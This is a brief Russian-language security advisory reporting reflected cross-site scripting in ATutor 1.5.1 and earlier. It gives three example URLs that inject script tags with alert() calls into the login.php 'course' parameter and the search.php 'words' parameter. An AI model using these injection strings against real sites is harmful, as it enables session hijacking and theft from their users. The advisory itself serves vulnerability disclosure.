Программа: ATutor 1.5.1 и более ранние версии

Удаленный пользователь может выполнить XSS
нападение.

Пример:

http://[target]/tour/login.php?course="><script> alert(‘Matrix_Killer
r0X’);</script>

http://[target]/tour/search.php?search=1& search=1&words="><script>alert(‘There
is no other place like 127.0.0.1’);</script>&include=all& find_in=all&d
isplay_as=pages

http://[target]/tour/search.php?search=1 &words="><script>alert(‘Found
By matrix_killer’);</script>&include=all& find_in=all&display_as=pages&submit=Sea
rch



Оставить мнение